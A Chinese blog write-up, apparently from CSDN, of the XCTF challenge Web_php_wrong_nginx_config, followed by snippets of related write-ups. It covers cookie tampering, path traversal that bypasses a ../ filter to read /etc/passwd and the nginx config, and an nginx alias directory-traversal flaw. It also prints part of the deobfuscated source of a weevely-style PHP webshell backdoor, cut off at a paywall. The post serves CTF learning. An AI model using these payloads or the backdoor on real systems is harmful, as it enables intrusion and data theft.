攻防世界web进阶区Web_php_wrong_nginx_config

最新推荐文章于 2025-02-02 10:59:45 发布
最新推荐文章于 2025-02-02 10:59:45 发布
阅读量488 收藏 2
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gongjingege/article/details/108001520
版权
该博客讲述了作者在攻防世界web进阶区遇到的一道题目,涉及文件包含漏洞的利用。通过分析robots.txt、登录状态的改变、URL路径以及代码审计,发现了目录遍历漏洞。最终利用漏洞读取了配置文件并解密得到了flag。过程中遇到了Python版本兼容性问题,通过学习和修改脚本,成功获取了flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开题目链接
出现了个登陆界面,随便试着登一下

在这里插入图片描述在这里插入图片描述

提示网站建设中,以为是sql注入,结果全是提示这玩意

看一下robots.txt

在这里插入图片描述

挨个访问一下

在这里插入图片描述hint.php给了一个文件路径,可能是文件包含方面的

但是Hack.php自动跳转到登陆界面,题目不可能给没用的,抓包看一下

在这里插入图片描述将islogin改成1,就成为登陆状态,然后放包

在这里插入图片描述

除了管理中心以外,其他的点击会跳转到登陆界面

那就看一下这个管理中心

url出现新的路径,如果admin访问正常,会please continue

在这里插入图片描述
那么file,和ext文件扩展名,会不会是文件包含漏洞

试一下,发现…/被过滤了

emmmm,测试一下

在这里插入图片描述
在这里插入图片描述
想到双写,但半天没弄出来,看下大佬的payload

在这里插入图片描述读取到 /etc/nginx/sites-enabled/site.conf 配置文件
审计代码

在这里插入图片描述

在 url访问 /web-img , 就会访问系统根目录下的 /images/

在这里插入图片描述
在这里插入图片描述
嗯,一个目录遍历漏洞

遍历目录 , 在 /var/www 下能找到 hack.php.bak

在这里插入图片描述
下载下来,发现一堆乱码

在这里插入图片描述

看下wp,也不太懂php混肴后门还是weevely 生成的 WebShell 后门 。。。

echo $f 得到
在这里插入图片描述

<?php
$kh="42f7";
$kf="e9ac";
function x($t,$k) {
   
	$c=strlen($k);
	$l=strlen($t);
	$o="";
	for ($i=0;$i<$l;) {
   
		for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
   
			$o.=$t {
   
				$i
			}
			^$k {
   
				$j
			}
			;
		}
	}
	return $o;
}
$r=$_SERVER;
$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];
if($rr&&$ra) {
   
	$u=parse_url($rr);
	parse_str($u["query"],$q);
	$q=array_values($q);
	preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
	if($q&&$m) {
   
		@session_start();
		$s=&$_SESSION;
		$ss="substr";
		$sl="strtolower";
		$i=$m[1][0].$m
最低0.47元/天 解锁文章
红队攻防渗透技术实战流程:红队资产信息收集之单个目标信息收集
HACKONE的博客
03-25 1241
根据目标网站的大小确定数据库类型首先,成本上的差距,access是不要钱的,mysql也是开源的,sql server 是收费的一般也就几千,Oracle的费用则数万。C段指的是同一内网段内的其他服务器,每个IP有ABCD四个段,举个例子,192.168.0.1,A段就是192,B段是168,C段是0,D段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255中的一台服务器,然后利用工具嗅探拿下该服务器。有时候网站的响应包会携带server信息,如下,这种情况多存在内网中。
攻防世界WebWeb_php_wrong_nginx_config
Light_inthe_eyes的博客
11-03 2111
首先进来是一个登录页面: 通过御剑扫描,发现了robots.txt,打开发现两个php文件: hint.php: Hack.php是跳转到登录页面: 抓包看看Hack.php,发现了可疑的点Cookie:isLogin=0,不妨修改为1,进入控制中心: 发现url中file=index&ext=php,不妨测试一下../,发现这里过滤了../: 绕过../,根据hint.php可以知道配置文件的路径,那就构造payload:file=....//....//....//....//etc/nginx
攻防世界-WEB进阶-Web_php_wrong_nginx_config
qq_64966153的博客
07-05 1598
攻防世界
Web攻防世界Web_php_wrong_nginx_config
uuzeray的博客
11-26 742
file=./index.php,回显正常。再输入../index.php仍显回显正常,可能../被替换为空,尝试inde../x.php,发现回显仍然正常,印证猜想)访问/web-img../proc/1/environ。这里太明显了,file就是文件名,ext是文件后缀。找到hack.php.bak,访问,下载附件。查看源码,好家伙,不管输什么都进不去。直接访问根目录/web-img../我的评价是,不多纠结,直接拿脚本打了。经过尝试发现../被替换为空。双写绕过即可..././
[wp] 攻防世界 Web_php_wrong_nginx_config
MercyLin的博客
10-03 3003
在robots.txt下发现hack.php,访问抓包修改cookie 出现页面,抓包观察,发现在点击管理中心时url出现?file=index&ext=php 尝试进行文件读取,发现…/被过滤,根据题目提示构造url 获取conf文件,格式化后如下: 在这里插入代码片server { listen 8080; ## listen for ipv4; this ...
攻防世界 web web_php_wrong_nginx_config
qq_41696858的博客
09-05 411
打开场景,就一个登录界面,尝试SQL注入,没什么发现 那就扫一波目录吧 扫出来/admin目录和/robots.txt,进robots.txt看一看 User-agent: *Disallow: hint.php Hack.php 又拿到两个线索 看看hint.php 配置文件也许有问题呀:/etc/nginx/sites-enabled/site.conf 拿到线索,那么就要找任意文件读取,看看这个配置文件长啥样,访问Hack.php,看上去就像是别人给我们留的后门 只不过这个后门还要我们登录,what?
攻防世界 web高手进阶 7分题 Web_php_wrong_nginx_config
闵行小鱼塘
08-04 2023
继续ctf的旅程,攻防世界web高手进阶的7分题,本文是Web_php_wrong_nginx_config的writeup
攻防世界高手进阶通关教程(2)
玄道的网安博客
05-16 2890
我们就直接开始吧 web2 源码给出了加密后的字符串,我们解密即可 代码块 import base64 def python_decode(string): zimu = "abcdefghijklmnopqrstuvwxyz" rot_13 ="" for i in string: if i.isdigit(): rot_13 += i else: try:
【愚公系列】2023年06月 攻防世界-WebWeb_php_wrong_nginx_config
时光隧道
06-19 3813
PHP代码混淆后门脚本是指在进行PHP代码混淆的过程中,植入恶意代码以实现后门的攻击手段。一旦植入成功,黑客可以通过特定的操作指令,绕过用户身份验证,进入系统内部,获取敏感信息,甚至控制整个系统。常见的PHP代码混淆后门脚本类型有以下几种:直接将后门代码插入到混淆后的PHP代码中。在混淆后的PHP代码中设置特定的注释符号,在注释中写入后门代码,以达到隐藏的目的。在混淆后的PHP代码中创建了一个特定的变量或调用特定的函数,以此触发后门代码。
xctf攻防世界 Web高手进阶 Web_php_wrong_nginx_config
l8947943的博客
01-03 2805
这题做着也太难了,整理一部分,后面再继续吧,思考良久,能力不足! 1. 进入环境,查看内容 乍一看,感觉像是注入问题,admin一顿测试,网页建设中,好吧,掏出dirsearch一顿扫描,如图: 发现/robots.txt可以访问,戳进去思考。 2. 问题分析 访问/robots.txt,查看内容,如图: 也就是说有一个提示和一个入侵,我们打开提示页面,如图: 意思是Nginx配置文件是解题关键 接着再访问Hack.php,死活让你登录,如图: 没辙,尝试burpsuite抓包 此处我还
XTCTF Web_php_wrong_nginx_config
feng的博客
10-30 737
知识点 目录扫描 cookie 文件包含 nginx配置有问题导致存在目录遍历。 PHP混淆加密及其逆向利用 代码审计 python脚本 WP 进入环境先扫目录,这题扫目录挺重要的。 可以扫到/admin,login.php,robots.txt,/admin/admin.php之类的页面。最重要的就是robots.txt和/admin/admin.php这两个页面。 题目会提示你要登录,其中cookie里有一个isLogin,改成1就可以了。 robots.txt里面有提示,分别是Hack.php和h
攻防世界webWeb_php_wrong_nginx_config,python3后门
qq_42016346的博客
07-16 474
python3的后门。
攻防世界web进阶Web_php_wrong_nginx_config详解
hxhxhxhxx的博客
08-11 1310
攻防世界web进阶Web_php_wrong_nginx_config详解题目详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robots.txt 我们访问admin试试 我们接着访问hint.php 和Hack.php 这个打开直接弹窗 详解 好嘞,我们正式开搞! 发现这里有一个cookie为0的值,我们改为1 发现成功登录 进去瞎点一通,发现,只有管理中心可以改变url /admin/admin.php?file=index&
CTFWeb_php_wrong_nginx_config
qq_74263993的博客
04-04 905
hint.php告诉我们:配置文件也许有问题呀:/etc/nginx/sites-enabled/site.conf。file=./..././..././..././..././etc/passwd&ext==php绕过。将爆出来的东西整理一下,发现location /web-img开启了目录浏览 autoindex on;先对网站进行目录扫描,发现/admin/和/robots.txt。因此 alias 后面的路径是从系统根目录开始的 所以加一个../在/var/www下找到了。
2025.2.1——八、Web_php_wrong_nginx_config
2402_87387800的博客
02-02 1086
题目来源:攻防世界 Web_php_wrong_nginx_config
攻防世界 Web_php_wrong_nginx_config
2401_88752684的博客
01-08 553
点击hint.php,提示:配置文件也许有问题呀:/etc/nginx/sites-enabled/site.conf,进入Hack.php,提示登录,抓包Hack.php。再次改islogin参数为1,跳转入以下页面。尝试用御剑扫描一下,发现了admin页面,点进去显示如下。看看wp,原来要一直改islogin为1。显示如下,应该是一个文件包含。尝试抓包并该islogin参数为1,返回依旧不变。经过测试,应该是过滤了../符号,尝试绕过,得到以下。再扫描,发现robots.txt,点进去发现两个页面。
攻防世界web_php_wrong_nginx_config
2401_85133563的博客
02-02 878
但是这里有趣的事情发生了,就是我的穿越payload 不起效,​​​​​​​​​​​​​​。file=../index&ect=php,还是没有报错,这个不应该,除非上级有一摸一样的文件,但是可能性不是很大,我就猜../被过滤了。我真的看不下去了,看了wp,发现,哟一个hack.php的备份文件;后面就是跑脚本,加载一句话木马,很新颖的加载方式,在kali试了一下,打开页面是个登陆页面,没有注册选项,那就弱密码,admin,123456。这个看着好难受,而且也没有思路了,我就看了一下大佬的博客;
【刷题记录】攻防世界Web_php_wrong_nginx_config
m0_73683234的博客
03-19 440
很像一个文件包含,(如果是文件包含而且不做处理,是可以使用../这样的返回上一级目录来实现对任意文件的访问),这里在file处分别输入index./和index../,会发现在输入index../之后还会出现please continue。后面打开这个文件里面是一个php混淆之后的后门木马,如何利用是一个比较难的问题,网上有大佬的脚本可以利用,这个题我暂时就做到这里了,再写也就是网上找一个很多人复制粘贴过的脚本放上去没什么意思。再根据hint.php给的内容,一次一次的尝试就可以找到目标的位置了。
php parse url ctf,XTCTF Web_php_wrong_nginx_config
weixin_29732787的博客
04-14 426
XTCTF Web_php_wrong_nginx_configXTCTF Web_php_wrong_nginx_config知识点目录扫描cookie文件包含nginx配置有问题导致存在目录遍历。PHP混淆加密及其逆向利用代码审计python脚本WP进入环境先扫目录,这题扫目录挺重要的。可以扫到/admin,login.php,robots.txt,/admin/admin.php之类的页面。...
Web_php_wrong_nginx_config
最新发布
03-09
### 解决PHPNginx配置中的常见问题 对于Web PHP应用出错的情况,通常可以从以下几个方面排查和修正Nginx配置: #### 1. 配置文件验证 确保`nginx.conf`以及任何包含的站点配置文件没有语法错误。可以通过命令行工具来测试配置的有效性: ```bash nginx -t ``` 如果存在错误,上述命令将会指出具体的行号和描述。 #### 2. FastCGI 参数设置不当 为了使Nginx能够正确转发PHP求至PHP-FPM进程管理器,必须适当调整FastCGI参数。典型的配置如下所示[^1]: ```nginx location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/var/run/php/php7.4-fpm.sock; # 或者使用TCP连接如127.0.0.1:9000 fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } ``` #### 3. 权限与安全组策略 确认PHP-FPM监听套接字或端口具有足够的权限让Nginx访问,并且防火墙规则允许必要的通信流量通过。例如,在Linux环境中可能需要修改SELinux上下文或者临时禁用它来进行调试。 #### 4. 日志分析 利用详细的错误日志可以帮助定位具体的问题所在。增加日志级别有助于收集更多诊断信息: ```nginx error_log /path/to/error.log debug; access_log /path/to/access.log combined; ``` #### 5. Docker环境下的特殊注意事项 当运行于Docker容器内部时,建议创建专用网络以便两个服务之间更好地交互,并保持一致的工作目录结构以简化路径映射关系[^3]。 #### 6. 检查状态页面功能 启用并审查Nginx的状态页面可以提供关于性能瓶颈和服务健康状况的重要线索。这要求编译时加入了特定模块支持,并合理定义了访问控制列表(ALLOW/DENY)[^4].
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值